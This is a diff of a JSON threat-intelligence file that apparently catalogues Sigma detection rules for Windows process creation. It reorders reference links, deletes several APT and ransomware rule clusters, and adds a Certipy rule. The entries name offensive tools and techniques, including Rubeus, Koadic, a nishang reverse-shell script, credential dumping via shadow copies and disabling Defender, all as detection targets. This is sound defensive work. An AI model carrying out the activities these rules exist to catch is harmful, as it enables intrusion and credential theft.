"https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://twitter.com/splinter_code/status/1483815103279603714",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml"
],
"tags": "No established tags"
@@ -43848,9 +43373,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
"https://github.com/GhostPack/Rubeus",
"https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/",
- "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml"
],
"tags": [
@@ -43900,10 +43425,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://redcanary.com/blog/raspberry-robin/",
"https://twitter.com/Hexacorn/status/1187143326673330176",
- "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
+ "https://redcanary.com/blog/raspberry-robin/",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca",
+ "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_susp_exec.yml"
],
"tags": [
@@ -43990,10 +43515,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
+ "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
"https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml"
],
"tags": [
@@ -44098,39 +43623,6 @@
"uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a",
"value": "HackTool - SharpImpersonation Execution"
},
- {
- "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_taidoor.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1055.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d1aa3382-abab-446f-96ea-4de52908210b",
- "value": "TAIDOOR RAT DLL Load"
- },
{
"description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"",
"meta": {
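Review bot: As with the other APT deletions in this diff, the TAIDOOR cluster (uuid d1aa3382-abab-446f-96ea-4de52908210b) goes away without a tombstone or a commit-message reason. One extra check before merging: confirm no other cluster in this file still references d1aa3382-abab-446f-96ea-4de52908210b in its own "related" list, since the generator would otherwise emit a link to a UUID that no longer exists.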
@@ -44334,9 +43826,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/",
- "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js",
"https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/",
+ "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js",
+ "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml"
],
"tags": [
@@ -44569,8 +44061,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml"
],
"tags": [
@@ -44647,10 +44139,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://twitter.com/splinter_code/status/1483815103279603714",
"https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://twitter.com/splinter_code/status/1483815103279603714",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml"
],
"tags": "No established tags"
@@ -44671,8 +44163,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/dsnezhkov/TruffleSnout",
"https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md",
+ "https://github.com/dsnezhkov/TruffleSnout",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml"
],
@@ -44706,9 +44198,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
"https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml"
],
"tags": [
@@ -44728,41 +44220,6 @@
"uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d",
"value": "Sensitive Registry Access via Volume Shadow Copy"
},
- {
- "description": "Detects LockerGoga ransomware activity via specific command line.",
- "meta": {
- "author": "Vasiliy Burov, oscd.community",
- "creation_date": "2020/10/18",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_lockergoga_ransomware.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
- "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/",
- "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_lockergoga_ransomware.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1486"
- ]
- },
- "related": [
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "74db3488-fd28-480a-95aa-b7af626de068",
- "value": "LockerGoga Ransomware Activity"
- },
{
"description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs",
"meta": {
@@ -44777,10 +44234,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/EricaZelic/status/1614075109827874817",
- "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
"https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList",
+ "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://twitter.com/EricaZelic/status/1614075109827874817",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml"
],
"tags": [
@@ -44966,8 +44423,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1206692239839289344",
"https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/",
+ "https://twitter.com/0gtweet/status/1206692239839289344",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml"
],
"tags": [
@@ -44987,52 +44444,6 @@
"uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714",
"value": "Lolbin Runexehelper Use As Proxy"
},
- {
- "description": "Detects Trojan loader activity as used by APT28",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2018/03/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_sofacy.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/",
- "https://twitter.com/ClearskySec/status/960924755355369472",
- "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml"
- ],
- "tags": [
- "attack.g0007",
- "attack.execution",
- "attack.t1059.003",
- "attack.defense_evasion",
- "car.2013-10-002",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20",
- "value": "Sofacy Trojan Loader Activity"
- },
{
"description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images",
"meta": {
@@ -45046,8 +44457,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism",
+ "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml"
],
"tags": [
@@ -45080,9 +44491,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md",
"https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/",
"https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml"
],
"tags": [
@@ -45216,8 +44627,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/",
"https://dtm.uk/wuauclt/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml"
],
"tags": [
@@ -45252,8 +44663,8 @@
"logsource.product": "windows",
"refs": [
"https://redcanary.com/blog/right-to-left-override/",
- "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method",
"https://unicode-explorer.com/c/202E",
+ "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml"
],
"tags": [
@@ -45287,8 +44698,8 @@
"logsource.product": "windows",
"refs": [
"https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/",
- "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf",
"https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2",
+ "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml"
],
"tags": [
@@ -45329,8 +44740,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml"
],
"tags": "No established tags"
@@ -45384,14 +44795,14 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/gN3mes1s/status/941315826107510784",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
"https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
- "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://github.com/SigmaHQ/sigma/issues/3742",
- "https://twitter.com/gN3mes1s/status/941315826107510784",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
+ "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml"
],
"tags": [
@@ -45433,9 +44844,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1",
"https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml"
],
"tags": [
@@ -45568,8 +44979,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cyb3rops/status/1562072617552678912",
"https://ss64.com/nt/cmd.html",
+ "https://twitter.com/cyb3rops/status/1562072617552678912",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml"
],
"tags": [
@@ -45687,9 +45098,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
"https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
- "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml"
],
"tags": [
@@ -45744,106 +45155,38 @@
"value": "Suspicious Desktopimgdownldr Command"
},
{
- "description": "Detects activity mentioned in Operation Wocao report",
+ "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.",
"meta": {
- "author": "Florian Roth (Nextron Systems), frack113",
- "creation_date": "2019/12/20",
- "falsepositive": [
- "Administrators that use checkadmin.exe tool to enumerate local administrators"
- ],
- "filename": "proc_creation_win_apt_wocao.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1207671369963646976",
- "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1012",
- "attack.defense_evasion",
- "attack.t1036.004",
- "attack.t1027",
- "attack.execution",
- "attack.t1053.005",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab",
- "value": "Operation Wocao Activity"
- },
- {
- "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/05/05",
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
"falsepositive": [
"Unlikely"
],
- "filename": "proc_creation_win_malware_pingback_backdoor.yml",
+ "filename": "proc_creation_win_hktl_certipy.yml",
"level": "high",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
- "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_pingback_backdoor.yml"
+ "https://github.com/ly4k/Certipy",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certipy.yml"
],
"tags": [
- "attack.persistence",
- "attack.t1574.001"
+ "attack.discovery",
+ "attack.credential_access",
+ "attack.t1649"
]
},
"related": [
{
- "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9",
- "value": "Pingback Backdoor Activity"
+ "uuid": "6938366d-8954-4ddc-baff-c830b3ba8fcd",
+ "value": "HackTool - Certipy Execution"
},
{
"description": "Detects potential commandline obfuscation using known escape characters",
@@ -45859,10 +45202,10 @@
"logsource.product": "windows",
"refs": [
"https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/",
- "https://twitter.com/Hexacorn/status/885553465417756673",
- "https://twitter.com/vysecurity/status/885545634958385153",
- "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques",
"https://twitter.com/Hexacorn/status/885570278637678592",
+ "https://twitter.com/Hexacorn/status/885553465417756673",
+ "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques",
+ "https://twitter.com/vysecurity/status/885545634958385153",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml"
],
"tags": [
@@ -46053,9 +45396,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
"https://ss64.com/nt/dsacls.html",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
- "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml"
],
"tags": [
@@ -46139,8 +45482,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.youtube.com/watch?v=ro2QuZTIMBM",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml"
],
"tags": [
@@ -46275,7 +45618,7 @@
{
"description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule",
"meta": {
- "author": "Florian Roth (Nextron Systems), omkar72, oscd.community",
+ "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel",
"creation_date": "2019/01/29",
"falsepositive": [
"Legitimate administration activity",
@@ -46286,9 +45629,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.dfirnotes.net/portproxy_detection/",
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
"https://adepts.of0x.cc/netsh-portproxy-code/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
+ "https://www.dfirnotes.net/portproxy_detection/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml"
],
"tags": [
@@ -46475,8 +45818,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa",
+ "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml"
],
"tags": [
@@ -46509,9 +45852,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://twitter.com/gN3mes1s/status/1222088214581825540",
"https://twitter.com/gN3mes1s/status/1222095963789111296",
- "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml"
],
"tags": [
@@ -46544,8 +45887,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
"https://twitter.com/orange_8361/status/1518970259868626944",
+ "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml"
],
"tags": [
@@ -46569,8 +45912,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"
],
"tags": [
@@ -46639,8 +45982,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/",
+ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml"
],
"tags": [
@@ -46859,8 +46202,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
+ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"
],
@@ -46952,8 +46295,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
"https://twitter.com/johnlatwc/status/1408062131321270282?s=12",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"
],
"tags": [
@@ -47081,15 +46424,16 @@
"author": "_pete_0, TheDFIRReport",
"creation_date": "2022/02/21",
"falsepositive": [
- "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command."
+ "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.",
+ "Discord was seen using chcp to look up code pages"
],
"filename": "proc_creation_win_chcp_codepage_lookup.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml"
],
"tags": [
@@ -47143,64 +46487,6 @@
"uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4",
"value": "HackTool - SharPersist Execution"
},
- {
- "description": "Detects specific process parameters as used by Mustang Panda droppers",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community",
- "creation_date": "2019/10/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_mustangpanda.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/",
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
- "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml"
- ],
- "tags": [
- "attack.t1587.001",
- "attack.resource_development"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
